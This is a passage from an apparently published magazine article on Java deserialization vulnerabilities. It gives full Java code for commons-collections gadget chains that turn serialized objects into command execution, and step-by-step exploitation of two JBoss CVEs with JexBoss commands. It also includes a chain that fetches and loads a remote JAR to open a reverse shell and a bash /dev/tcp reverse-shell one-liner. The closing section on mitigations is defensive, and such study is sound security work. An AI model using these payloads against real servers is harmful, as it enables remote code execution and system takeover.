side" the Proxy) after deviation that occurs in readObject() of the external AIH, will be:
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proxy: The object that was used "as a trigger" for the invoke() method. In this example, the Proxy (type 

com.sun.proxy.$Proxy1) that has been assigned to the external AIH memberValues field.

method: The method used "as a trigger" for invoke(). That is, the "entrySet()" method, which is invoked 

in Proxy via the external AIH readObject(), in reference (3).

args: The arguments passed to the method used with trigger (the memberValues.entrySet()). In this case, 

the array args will be null, since no arguments are given for the entrySet().

It is thus seen that the value received in parameter “method” from invoke() (an entrySet() method object) is 

used to define the contents of the member variable, in reference (5) - which will store a String with the "entrySet" 

value. Later, at reference (6), this variable is used as a key to retrieve an item from the Map memberValues (an in-

ternal AIH field) - that is, memberValues.get("entrySet"), which is a nonexistent key. This is the ideal scenario to 

"assemble" the memberValues field of the internal AIH with one more useful feature present in the commons-

collections: a Map "decorated" with a LazyMap [36] (decorator).

Briefly, a LazyMap allows you to "decorate" a Map by providing it with the ability to create objects on demand (at run-

time). This is based on a factory, which is triggered whenever a non-existent key is accessed in the Map it decorated 

(exactly what happens in reference (6) of invoke()). The new object is created by the factory and then added to the 

map. This factory, therefore, will contain the core of the exploitation: the chain (ChainedTransformer) of classes In-

vokerTransformer [37].

Hint: It's worth noting that LazyMap is not the only decorator available to perform this exploitation. An alternative is 

the TransformedMap: which "triggers" the factory when changes occur on the map it decorated (e.g. via 

map.put() or map.setValue()). In addition, there are other paths that do not depend on the 

AnnotationInvocationHandler as a trigger, such as some options proposed by Matthias Kaiser [38] [39] (e.g. using a 

HashSet with TiedMapEntry). The latter are useful when the version of JRE in the tested system is >= 8u72 (from 

which AnnotationInvocationHandler was "hardenized" [40]) and will be used in CVE-2017-12149 case study.

Before addressing the InvokerTransformer gadget behavior, it is important to consolidate the general understanding 

of the payload explained up to this point. Figure 13, therefore, graphically illustrates the desired end result: external 

AIH, containing a Proxy into the memberValues field. The Proxy, in turn, encapsulates another AIH (internal AIH), 

which contains a LazyMap in its memberValues field. Finally, LazyMap loads the Transformers chain as a factory.
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Figure 13 - Final payload graphic illustration that reuses the AnnotationInvocationHandler as trigger gadget to trigger LazyMap 
factory

Reference (1) in Figure 13 represents the code in external AIH readObject() that causes the deviation to internal 

AIH invoke(). On the other hand, in reference (2), the internal AIH invoke() method invokes the LazyMap get() 

method (put in memberValues field) using a nonexistent key. The LazyMap get() method implementation, shown 

in reference (3), sets the final trigger that allows to execute arbitrary methods: The transform() method of Transform-

ers [41] (ChainedTransform) encapsulated as a factory "inside" LazyMap.

Among the Transformers objects that can be included "inside" LazyMap, there is the flexible InvokerTransformer, 

provided by commons-collections for the purpose of performing "transformations" on objects. Its documentation [37] 

readily reveals what makes it "special" in this context: "Transforms the input to result by invoking a method on the 

input." That is, InvokerTransformer allows you to transform objects into a collection (a Map, for example) by invok-

ing methods defined at runtime (potentially controllable by an attacker). For example, when creating an InvokerTrans-

former object, it is sufficient to assign (via constructor) the name of some arbitrary method, as well as its list of pa-

rameters and their types. When the "transformation" is triggered (in this scenario, in references (2) and (3) of Figure 

13, by memberValues.get (member) in LazyMap that uses the InvokerTransformer as factory), such a method will be 

invoked via Reflection. In addition, Transformer implementations are also serializable - thus meeting Condition 2.

Figure 14 shows the constructor and the InvokerTransformer transform() method - in which the invocation, 

via Reflection, of the method defined by the constructor (i.e. via data) is clear.

189

An Overview On Deserialization Vulnerabilities In Java Virtual Machine (JVM)

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


// InvokerTransformer constructor

public InvokerTransformer(String methodName, Class[] 

paramTypes, Object[] args) { //(1) constructor  

  super();  
  iMethodName = methodName; //(2) parameter that 

indicates the method to be invoked via Reflection 
  iParamTypes = paramTypes; //(3) types of parameters of 

the method to be invoked  
  iArgs = args; //(4) arguments to the method to be 

invoked  
}
// Transform Method (which can be triggered by LazyMap 

and thus invoke arbitrary methods via Reflection)

public Object transform(Object input) { //(5) method 

invoked to "transform" objects  
...

    Class cls = input.getClass();//(6) gets class that 

implements method to be invoked  
    Method method = cls.getMethod(iMethodName, 

iParamTypes); //(7) gets method to be invoked  
    return method.invoke(input, iArgs); //(8) invokes the 

method via reflection (BUM)!!  
...

Figure 14 - InvokerTransformer constructor and transform method

In addition, you can create an InvokerTransformers array to be executed in a chain (via ChainedTransformer), so that 

the result (the return) of one method is used as input to the next - thus enabling more elaborate constructions, such as 

developed in [42]. As a result of this scenario, one can force the analogy that commons-collections is for JVM in 

Property-Oriented Programming (POP) as well as libc is for Return-Oriented Programming (ROP) - providing the 

attacker with a Turing - complete language. Note the following commented code (Figure 15), in which the concepts pre-

sented are used together (Transformers and LazyMap). Initially, an array is created with transformers objects that, 

when chained together, result in the following construction (which executes code in the operating system):

((Runtime)Runtime.class.getMethod("getRuntime", new Class[0]).invoke(null, new 

Object[0])).exec("touch /tmp/h2hc_example1");
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191

public static void main(String[] args)  
    throws ClassNotFoundException, NoSuchMethodException, InstantiationException, 

    IllegalAccessException, IllegalArgumentException, InvocationTargetException { 

  String cmd[] = {"/bin/bash", "-c", args[0]}; // Command to run  

  Transformer[] transformers = new Transformer[] {  

    //(1)returns class Runtime.class  

    new ConstantTransformer(Runtime.class),  

    //(2) 1st. InvokerTransformer, result: getMethod("getRuntime", new Class[0]) 

    new InvokerTransformer(  

      "getMethod",                  // invokes method getMethod  
      ( new Class[] {String.class, Class[].class } ),// Parameter types: (String, Class 

[])  
      ( new Object[] {"getRuntime", new Class[0] } ) // arguments: ("getRuntime", new 

Class [0])  
    ),  
    //(3) 2nd. InvokerTransformer, result: invoke(null, new Object[0])  

    new InvokerTransformer(  

      "invoke",                   // invokes method  
      (new Class[] {Object.class, Object[].class }),//parameter types : (Object, Object 

[])  

      (new Object[] {null, new Object[0] })     // arguments: (null, new Object[0]) 
    ),  
    //(4) 3rd. InvokerTransformer, result: exec(cmd[])  

    new InvokerTransformer(  

     
}
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      "exec",             // invokes method: exec  
      new Class[] { String[].class }, // parameter types: (String[])  
      new Object[]{ cmd } )      // arguments: (cmd[])  
  };  
  //(5) Creates ChainedTransformer object with Transformers array: 

  Transformer transformerChain = new ChainedTransformer(transformers);  
  //(6) Creates map  
  Map map = new HashMap();  

  //(7) Decorates the map with LazyMap and transformer chain 
  Map lazyMap = LazyMap.decorate(map,transformerChain);  
  lazyMap.get("h2hc"); //(8) Tries to recover a nonexistent key in the map (BOOM)! 
}

Figure 15 –- ChainedTransform that is "triggered automatically" and executes a command when a nonexistent key is accessed in a 
LazyMap

 

The array transformers is added to the ChainedTransformer (reference (5), Figure 15) and then used as the factory 

of a LazyMap (which returns the Map decorated for the lazyMap variable in reference (7). Finally, reference (8) tries 

to get a lazyMap value using a non-existent key: which, according to the previous explanation, will "trigger" the fac-

tory (LazyMap get() method invokes the transform() ChainedTransfomer method) - thus resulting in the execu-

tion of the command. Note also the green highlighting (String[].class), which is a simple fix with respect to the 

Frohoff version [29], in order to allow more complex commands execution (e.g., containing pipes and redirectioning).

 

Transcribing:

$ git clone https://github.com/joaomatosf/

JavaDeserH2HC.git

$ cd JavaDeserH2HC

$ javac -cp .:commons-collections-3.2.1.jar 

ExampleTransformersWithLazyMap.java

$ rm /tmp/h2hc_lazymap

$ java -cp .:commons-collections-3.2.1.jar 

ExampleTransformersWithLazyMap

$ ls -all /tmp/h2hc_lazymap

Complementing this example with the previously studied Proxy, we obtain the final payload that "automatically trig-

gers" the transformers chain during deserialization of the external AIH (previously shown in Figure 13). Namely, fol-

low the additional steps required:
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1) Create an AnnotationInvocationHandler object (which will be the internal AIH) containing, in the member-

Values field, the lazyMap instantiated in reference (7) of Figure 15 (which, remember, executes Chained-

Transformer when a nonexistent key is "queried");

2) Create a Proxy between the Map interface and the internal AIH defined in previous step (this Proxy, having 

a method invoked, will divert the flow to the internal AIH invoke() method, which activates LazyMap);

3) Instantiate a new AnnotationInvocationHandler (external AIH) and assign the Proxy to its memberValues 

field. This, therefore, can be serialized and used as payload.

Thus, during the external AIH deserialization, its readObject() method should trigger the Proxy in the 

memberValues.entrySet() call (remember, reference (3) of Figure 12 and reference (1) of Figure 13). This will de-

flect the execution flows to internal AIH invoke()method (which is "inside" the Proxy), which initiates the trig-

ger in the memberValues.get("entrySet") call (reference (6) in Figure 12 and reference (2) Figure 13 ) - caus-

ing LazyMap to run the Transformers chain (used as a factory).

It may seem a bit confusing in a first reading, but the following code (Figure 16) reveals that few additional lines are 

required with respect to the example in Figure 15. The three steps described above are highlighted in the code.
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// Creates the ChainedTransformer object with the Transformers array: 
Transformer transformerChain = new ChainedTransformer(transformers);  

// Creates the map  

Map map = new HashMap();  
// Decorates the map with LazyMap and the transformation chain 
Map lazyMap = LazyMap.decorate(map,transformerChain);  
//(1) creates internal AIH (via Reflection) and assigns the lazyMap to the 

memberValues field via constructor  

Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");  
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);  
ctor.setAccessible(true);  
InvocationHandler handlerLazyMap = (InvocationHandler) 

ctor.newInstance(Retention.class, lazyMap);  

// creates interface map  

Class[] interfaces = new Class[] {java.util.Map.class};  
//(2)) creates the Proxy "between" the map interface and the internal AIH 

(which contains the LazyMap)  

Map proxyMap = (Map) Proxy.newProxyInstance(null, interfaces, handlerLazyMap);  
//(3) Instantiates the External AIH and assigns the Proxy to the memberValues 

field  
// Remember that the Proxy "interconnects" the Map interface and the internal 

AIH (containing LazyMap)  
InvocationHandler handlerProxy = (InvocationHandler) 

ctor.newInstance(Retention.class, proxyMap);  

// Serializes the AIH External and saves to file 
System.out.println("Saving serialized object in 

ExampleCommonsCollections1.ser");  
FileOutputStream fos = new FileOutputStream("ExampleCommonsCollections1.ser");  

ObjectOutputStream oos = new ObjectOutputStream(fos);  

oos.writeObject(handlerProxy);  
oos.flush();

Figure 16 –Internal and External AIH, which will contain the LazyMap and Proxy, respectively, to generate the final payload that 
activates the LazyMap factory during deserialization of the External AIH
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The following command sequence (Figure 17) can be used to compile the final code and generate the serialized object - 

which can be injected into inputs that perform deserialization.

Figure 17 - Compiling and generating payload that reuses commons-collections gadgets

Figure 18 demonstrates how to run the vulnerable testing application (which performs native deserialization of data 

received from users) and exploit it with the generated payload. Note that cp parameter is used to specify the applica-

tion's classpath - in this case, the commons-collections-3.2.1.jar lib was included.

Figure 18 –Compiling, Running, and Exploiting the Testing Lab

Note: It is important to note again that this version (which reuses an AnnotationInvocationHandler as trigger gadget) 

should work correctly on systems operating with JRE <8u72 and containing the "vulnerable" commons-collections 

library in the classhpath. If an IncompleteAnnotationException is received, it can be adapted to reuse a HashSet 

with TiedMapEntry, as implemented in [38] and the example that will be demonstrated in the CVE-2017-12149 case 

study.

195

An Overview On Deserialization Vulnerabilities In Java Virtual Machine (JVM)

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


HINT: Useful ChainedTransformers

Once the basis of the exploitations is understood, it is opportune to develop payloads that can help in the 

validation of vulnerable environments - however, without causing damage to the system tested. There are two 

ChainedTransformers examples as follows that can be "coupled" to the previous code - or to other versions.

1) Thread.sleep

This chain allows rapid vulnerability validation by forcing the execution of a sleep by the application - 

which also makes Blind Injection viable [43].

Thread.class.getMethod("sleep", new Class[]{Long.TYPE}).invoke(null, new Object[] 

{10000L})

Transformer[] transformers = new Transformer[] {  
  new ConstantTransformer(Thread.class), // returns class Thread.class  
  new InvokerTransformer( // 1st. Object InvokerTransformer: getMethod("sleep", new 

Class[0])  

    "getMethod",            // invokes getMethod method  
    ( new Class[] {String.class, Class[].class } ),// parameters types: (String, 

Class[])  

    ( new Object[] {"sleep", new Class[]{Long.TYPE} } ) // args: (sleep, Long.TYPE) 

  ),  

  new InvokerTransformer( // 2nd. Object InvokerTransformer: invoke(null, 10000) 

    "invoke",             // invokes method: invoke  
    (new Class[] {Object.class, Object[].class }),// parameters types: (Object, 

Object[])

    (new Object[] {null, new Object[] {10000L} }) // args: (null, new Object[]

{10000L})  
  )  
};

2) DNS Resolve

Originally published by [44], it uses a URL object within the InvokerTransformer to attempt to perform 

an HTTP GET at an address controlled by the tester. If the application is vulnerable to CVE-2015-7501, it 

should consult the DNS address (dns lookup) in order to resolve the URL and perform the GET. If the 

domain is registered and configured / hosted by the tester (eg using bind), query (if executed) can be 

observed in the service/daemon logs.

new URL("http://test.testerdomain.com").openConnection().getInputStream().read()

String url = "http://test.testerdomain.com";  
Transformer[] transformers = new Transformer[] {  

    new ConstantTransformer(new URL(url)),  

    new InvokerTransformer("openConnection", new Class[] { }, new Object[] {}),  
    new InvokerTransformer("getInputStream", new Class[] { }, new Object[] {})

};

Based on this last one, Gabriel Lawrence published another gadget chain for the same purpose, however, removing 

the dependency of the commons-collections gadgets. This is possible since the URL class is serializable and tries to 

resolve the url domain when having the equals method or the hashCode invoked. In this way, it can be added as a key 

in a HashMap (also serializable), thus causing its hashCode method to be invoked during HashMap deserialization - 

which will consequently perform dns lookup. The details can be seen in [45].
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Transformer[] transformers = new Transformer[] {  
    new ConstantTransformer(new URL(url)),  

    new InvokerTransformer("openConnection", new Class[] { }, new Object[] {}),  
    new InvokerTransformer("getInputStream", new Class[] { }, new Object[] {})

};

Based on this last one, Gabriel Lawrence published another gadget chain for the same purpose, however, removing 

the dependency of the commons-collections gadgets. This is possible since the URL class is serializable and tries to 

resolve the url domain when having the equals method or the hashCode invoked. In this way, it can be added as a key 

in a HashMap (also serializable), thus causing its hashCode method to be invoked during HashMap deserialization - 

which will consequently perform dns lookup. The details can be seen in [45].

Case Studies

The next subsections exemplify how to bring knowledge into practice by exploiting two CVEs. These were selected be-

cause they are easy to understand - therefore, didactic. The first one affects JBoss AS in versions <= 4.X, while the sec-

ond one runs versions <= 6.X (and was specially published to be used in this example).

CVE-2017-7504 

This subsection demonstrates how to exploit JBossMQ (CVE-2017-7504), a messaging service (JMS) included by de-

fault in JBOSS AS <= 4.X.

Although it is a version no longer supported by RedHat, JBoss 4.X is commonly found based on the number of applica-

tions that depend on that platform to function. For example, the case of StarBucks #221294 

(https://hackerone.com/joaomatosf), which caused this CVE to become public. 

JBossMQ has an invocation layer via HTTP (HTTP Invocation Layer), which acts by forwarding messages to the JMS 

service. The class responsible for handling requests is the HTTPServerILServlet.class, whose complete code can be eas-

ily found on the Internet (or, if desired, decompiled).

Checking the code is sufficient to identify a possible injection point in the processRequest() method. Notice the 

red flag highlighted in the code shown in Figure 19.
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protected void processRequest(HttpServletRequest request, 

HttpServletResponse response) throws ServletException, 

IOException . . .

    response.setContentType(RESPONSE_CONTENT_TYPE);

    ObjectOutputStream outputStream = new 

ObjectOutputStream(response.getOutputStream());

    try {

      ObjectInputStream inputStream = new 

ObjectInputStream(request.getInputStream());

      HTTPILRequest httpIlRequest = 

(HTTPILRequest)inputStream.readObject();//(1) red flag

      String methodName = httpIlRequest.getMethodName();

Figure 19 - Code from the HTTPServerILServlet class, which performs deserialization of user-supplied data

 

Between the two parameters in the processRequest() (request and response) method, the first parameter is used 

to read the content (in binary format) received in HTTP POSTs (request.getInputStream()) and place it in an 

ObjectInputStream. In the next line, readObject() is invoked - which reveals the beginning of the deserializa-

tion process. In light of this, it remains to be determined whether this method can be achieved by user-supplied data. 

Two quick approaches can be followed:

1) load the code into an IDE (eg Eclipse, IntelliJ) and try to trace the execution path to the 

ObjectInputStream.readObject() or;

2) investigate the application context, such as mappings between URLs and Servlets.

The second path is appropriate for this scenario, since it is a code that suggests being "reached" directly by HTTP re-

quests. In fact, the application descriptor file analysis (jbossmq-httpil.war/WEB-INF/web.xml) reveals the URL 

mapped to its Servlet (HTTPServerILServlet), as shown below:

<servlet-mapping>  
  <servlet-name>HTTPServerILServlet</servlet-name>  

  <url-pattern>/HTTPServerILServlet/*</url-pattern>  
</servlet-mapping>

Figure 20 - Excerpt from the jbossmq web.xml that displays the mapping between the URL and the Servlet HTTPServerILServlet

	

It is possible to download JBOSS AS version 4 and test it in order to practice the concepts presented here. It is also nec-

essary to install the Java Virutal Machine (JVM), which can be obtained directly from the Oracle website. See the RE-

ADME in the github of this paper for more detailed instructions. After installing "Java" (JDK), use the following in-

structions to get and run JBOSS:  
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$ wget https://downloads.sourceforge.net/project/jboss/

JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA.zip

$ unzip jboss-4.2.3.GA.zip

$ cd jboss-4.2.3.GA/bin

$ ./run.sh -b 0.0.0.0 (ou run.bat -b 0.0.0.0, caso esteja 

em um Windows)

That been said, condition 1 is satisfied: Servlet that performs deserialization is reachable via a URL, through HTTP 

POSTs, without requiring any type of authentication.

One can thus proceed with the search of some class available in the classpath that can be reused (gadget). However, 

before investigating specific libraries present on the platform under review, it is timely to test the commons-collections 

public gadgets (exemplified in the previous subsection) as well as the golden-gadgets. In this case, condition 2 is satis-

fied by commons-collection (Java Application Servers usually have a large library base, including it).

Figure 21 thus demonstrates the generation of payload to reuse gadgets from commons-collections and subsequent 

validation/exploitations by obtaining a reverse shell. Note that the command used in the payload should work only on 

*nix systems. In the following subsection, however, a gadget chain capable of achieving platform-independent reverse 

shell connection (e.g., Linux, Windows, IBM OS, MacOS, etc.) will be presented.

Figure 21 - Exploiting JBossMQ (CVE-2017-7504)

 

The same procedure can be performed using JexBoss. The tool will check for this and other deserialization vulner-

abilites - some specific to JBoss, while others are independent of the application server.
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$ git clone https://github.com/joaomatosf/jexboss.git

$ cd jexboss

$ ./jexboss.py --disable-check-updates --servlet-

unserialize -u http://YOURJBOSS/jbossmq-httpil/

HTTPServerILServlet -F --cmd 'touch /tmp/poc'

or

$ ./jexboss.py --disable-check-updates -u http://

YOURJBOSS:8080 

As a mitigation of this vector, it is suggested to remove (delete) the HTTP Invocation Layer component from 

JBossMQ(jbossmq-httpil.sar file/directory). If this service is actually used, you should restrict access to the 

"/HTTPServerILServlet" context through web.xml file (eg, replace/restricted/*with only/* in the <url-pattern>/

restricted/*<url-pattern> tag in <security-constraints> block). Note, however, that other vulnerabilities should still 

affect the server, as may be noted by JexBoss. Further mitigation measures will be discussed in the subsection dedi-

cated to this purpose.

CVE-2017-12149 and gadget chain to reverse shell multiplatform

This CVE addresses another Servlet that performs unsafe deserialization on data received via HTTP POSTs and, by de-

fault, affects JBoss AS <= 6.X (ie, 3.X, 4.X, 5.X, 5.X EAP and 6.X). For the publication of these details, RedHat was no-

tified on August 22, 2017 and confirmed the vulnerability on the 24th of that month [46].

The vulnerability occurs in ReadOnlyAccessFilter.class class which, curiously, is intended to provide "secure access" 

(read only) to the Java Naming and Directory Interface (JNDI) service / API.

Similar to previous case, the code analysis, followed by the verification of the application descriptor file, is sufficient to 

identify the failure and the injection point, respectively. Figure 22 shows the section of the vulnerable method, in 

which the content received in HTTP POSTs is loaded (references (1) and (2)) and then deserialized (reference (3)). 

The application descriptor, which defines the mapping of this Servlet with its URL, is seen in Figure 23.
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public void doFilter(ServletRequest request, 

ServletResponse response,

...

     ServletInputStream sis = request.getInputStream();// 

(1) Reading POST data

     ObjectInputStream ois = new 

ObjectInputStream(sis);//(2) Starts ObjectInputStream 

with data

     MarshalledInvocation mi = null;

     try {

      mi = (MarshalledInvocation) ois.readObject();//(3) 

Deserializes data!

Figure 22 - Excerpt from the ReadOnlyAccessFilter class, which performs deserialization of user-supplied data

<servlet-mapping>  
  <servlet-name>ReadOnlyAccessFilter</servlet-name>  

  <url-pattern>/readonly/*</url-pattern>  
</servlet-mapping>

Figure 23 - Excerpt from the web.xml of invoker.war that displays the mapping between the URL and the ReadOnlyAccessFilter 
Servlet 

Figure 23 shows that requests to the "/readonly/*" context are intercepted and handled by the ReadOnlyAccessFilter 

Servlet, where the code is to be reached. It should be noted that the invoker.war component, which contains the class 

in question, is already known to suffer from other vulnerabilities (such as InvokerServlet, via JMXInvokerServlet and 

EJBInvokerServlet contexts), which can be validated by JexBoss since 2014. For demonstration of this case, a gadget 

chain will be presented that allows obtaining a command terminal via reverse connection, independent from the target 

platform (tested in Windows, Linux, IBM OS and MacOS). To do so, reuse of commons-collections gadgets and native 

JRE classes was done in order to load and dynamically execute a remote component - hosted by the tester on a web 

server.

In addition, a HashSet was used as a trigger gadget (version proposed by Matthias Kaiser) - instead of AnnotationIn-

vocationHandler - so as to work on systems with versions of Oracle JRE / JDK> = 8u72 and IBM Java as well. In 

short, the general idea of the trigger is that by creating a TiedMapEntry containing the already known LazyMap (eg. 

new TiedMapEntry(lazyMap,“any-key”)) and invoking its hashCode() method, will result in a 

lazyMap.get("any-key") - which, it is known from the previous examples, triggers the chain of transformers. Combined 

with this, during the deserialization of HashSet, its magic method readObject() iterates through all items and adds 

them to a HashMap (invoking map.put (key, value)). The put method, in turn, invokes the hash (key) - to ensure that 

each key is unique. Thus, in order to calculate the appropriate keys hash, the hashCode () of the object is invoked (in 
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this case, TiedMapEntry.hashCode()) - bingo!. Keep in mind, therefore, that a HashMap will achieve (diverting the 

flow to) the object hashCode() method (which is the point that needs to reach the TiedMapEntry in order to trigger the 

chain transformers).

HINT: Use the code from the first example (TestDeserialize.java) in order to debug the deserialization of the payload 

presented - and thus better understand the flow involved.

The developed transformers chain (Figure 24) succinctly draws on Java's Reflection capability to instantiate a server-

side URLClassLoader [47] and, with it, "include" an external code in the system at runtime.

String remoteJar = "http://joaomatosf.com/rnp/

JexRemoteTools.jar";

Transformer[] transformerUrlClassLoad = new Transformer[] 

{  

    new ConstantTransformer(URLClassLoader.class),  
    new InstantiateTransformer(// (1) Initializes 

URLClassLoader providing remote component URL 

        new Class[]{  

            URL[].class  

        },  

        new Object[]{  

            new URL[]{new URL(remoteJar)}  

        }),  
    new InvokerTransformer("loadClass", // (2) Invokes 

method to load JexReverse class  

        new Class[]{  

            String.class  

        },  

        new Object[]{  

            "JexReverse"  

        }),  
    new InstantiateTransformer(// (3) Initializes 

JexReverse providing IP and Port for reverse 

        new Class[]{ String.class, int.class },  
        new Object[]{ IP, port } ) };

Figure 24 - Gadget chain to load and execute a class on externally hosted component
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In reference (1), an InstantiateTransformer (another type present in the commons-collections) is used, which will ini-

tialize a URLClassLoader object during the "transformation". The URL of the remote component, which you want to 

load on the tested system, is set as the constructor parameter. Another way to do this would be by using two Invoker-

Transformers objects (instead of an InstantiateTransformer) to invoke the getConstructor and newInstance methods 

of the URLClassLoader class, respectively. The result, however, would produce a greater payload.

Notice that this process (instantiation) only occurs at runtime (when the chain Transformers is activated). This is why 

it is possible to use non-serializable types in the chain. In other words, objects created via Reflection, such as URL-

ClassLoader, will be instantiated only on server-side - not serialized and included in payload (which would not be pos-

sible).

Next, the loadClass() method is invoked in order to load the JexRemote class (reference (2)). At this time, if the 

server is vulnerable and has access to the Internet, it should download the JexRemoteTools.jar file, which is included 

in the link. Finally, the JexRemote object will be instantiated (reference (3)), receiving as parameters the IP address 

and the port to establish the reverse shell connection - which is done by a method invoked by the constructor itself. 

This last class (JexRemote) is based on a WebShell JSP [48] and can be used as a starter for "integration" with Meter-

preter. Besides this, any other Java code could be loaded in the JVM (code injection), generating a difficult detection 

situation (since it is not necessary to create new processes or write data in the filesystem).

To test the concepts presented, you can download and run the latest version of JBOSS AS 6.X using the following in-

structions:

$ wget http://download.jboss.org/jbossas/6.1/jboss-as-

distribution-6.1.0.Final.zip

$ unzip jboss-as-distribution-6.1.0.Final.zip

$ cd jboss-6.1.0.Final/bin

$ ./run.sh -b 0.0.0.0 (OR run.bat -b 0.0.0.0, in case if 

Windows)

Figure 25 finally shows the generation of the payload presented and the respective exploitation of CVE-2017-12149 in 

a JBoss AS 6.1.0.Final. Note that the IP address and port of the server that will receive the reverse connection are pro-

vided as a parameter. As in the previous case study, if desired, you can use JexBoss to automate this process, as well as 

the Test Lab instead of a JBoss (e.g., java -cp .:commons-collections-3.2.1.jar VulnerableHTT-

PServer).
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Figure 25 - Exploitation of CVE-2017-12149 with use of the gadget chain for reverse shell connection multiplatform

It should be noted that this chain gadget is not limited to JBoss AS. Java systems (JVM) in general, which perform 

insecure deserialization and have the commons-collections library in classpath, should be affected. There are also 

other techniques for getting reverse connection, as seen in the previous case study, such as running the command on 

*nix systems: /bin/bash -c /bin/sh -i>&/dev/tcp/IP/Port<&1. However, as already explained, the gadget 

chain of Figure 24 should work equally well on Windows platforms.

The mitigation of this vector is similar to the previous case: remove (delete) the component containing the vulnerable 

class (invoker.war) or the class itself (ReadOnlyAccessFilter.class). Likewise, if the service is used, access to the 

"/readonly/*" context must be restricted through the http-invoker.sar/invoker.war/WEB-INF/web.xml file (e.g., 

replace/restricted/*for only/* in the <url-pattern>/restricted/*</url-pattern> tag in the <security-constraints> 

block). Note, however, that other vulnerabilities should still affect the server, as may be noted by JexBoss.

Considerations on mitigation measures

The mitigation of such vulnerabilities, with respect to the native JVM cases, runs through different layers: from proper 

management of application dependencies (i.e., updates to libraries/frameworks and platforms), through secure encod-

ing (i.e., using Look-ahead with strict whitelist) and entering into external mechanisms to the application.

Importantly, it may be insufficient to recommend "do not rely on user input" only at the application level. This is be-

cause often the injection occurs not in the application code itself (where one would have the chance to implement 

Look-ahead), but in platform or in frameworks / libraries used by them - that perform deserialization without develop-

ers’ control/knowledge. Therefore, you must recognize that the attack surface goes beyond your code.
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From Java versions 6u141, 7u131, 8u121 and 9, you can take advantage of JDK Enhancement Proposals (JEP) 290 

[49]: a JVM-based look-ahead implementation. Not only type filters are supported, but also other properties, such as 

size arrays, object graph depth and number of references. In this way, protection extends to attacks that cause DoS 

(which are not avoided with look-ahead techniques).

When you enable JEP 290, you can choose three types of filters (which are automatically evaluated before deserializa-

tion), one of which is global (process-wide) - whose effect is applied to all ObjectInputStream, and it is not necessary 

to make modifications to the code. Settings, such as the list of allowed classes and other properties, are easily set via 

System Properties. The other two filters types (custom and built-in) are available only from the JVM version 9. It 

should be noted, however, that the use of whitelist requires application deep knowledge and the underlying platform 

in order to avoid "blocking" of necessary types (and which do not pose risks). The use of blacklisting, on the other 

hand, is discouraged [50].

In versions of the JVM earlier than those mentioned, an alternative is to employ Java Agents, such as NotSoSerial. 

Like code look-ahead, the agent can act with filters to be checked before invoking the resolveClass() method - but glob-

ally. Note, however, that this approach adds extra overhead to the application - which, in certain situations, may be im-

practical.

In addition, other layers/mechanisms deserve to be considered. Certain situations may be mitigated by the proper use 

of a reverse proxy, while others may be blocked by Intrusion Prevention Systems/Web Application Firewalls (IPS/

WAF) - when properly positioned. Of course, be aware that both of these controls are subject to bypass techniques 

(e.g., via SSRF or encoding).

Operating system hardening, coupled with the use of a mandatory access control (e.g., SELinux), in addition to the dis-

cretionary (traditional permission), can help limit the damage caused by exploitation. In addition, the audit of all 

execve system calls made by the user running the application server, makes it easier to identify certain violations (such 

as running commands via Runtime.exec(cmd)). Another relevant suggestion is to use a restrictive default policy in the 

INPUT of the local firewall of the servers in order to hinder lateral movement via the RMI and JMX protocol ports.

Not least, it is recommended to limit the access of the servers to the Internet, in addition to the internal DNS service 

(using, when possible, static resolution). In this way, a possible intruder is "limited" to blind injection (e.g. using sleep) 

- which requires more time and traffic, thus increasing the chances of detection.

This non-exhaustive set of recommendations is sufficient to indicate the paths to be followed. Each team, however, 

needs to appropriately list and evaluate actions appropriate to their environments.

Lastly, keep talented professionals and, if possible, a red team. =]
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Discussion and Conclusion

This document discussed deserialization vulnerabilites in Java Virtual Machine (JVM) context. Although the scope has 

been limited to few cases, the foundations presented are the basis for expanding the studies to more elaborate scenar-

ios - including other platforms.

In addition to the topics covered in practical examples, there are also vulnerabilities involving third-party libraries 

used for (de)serializing objects in open formats (e.g., XML, JSON). The most notable examples are the famous 

XStream libraries [51] [52] - widely adopted in opensource projects - and XMLDecoder [53] - common in SOA sys-

tems. The first works just like the native process (invoking magic methods), but using XML notation. In github of this 

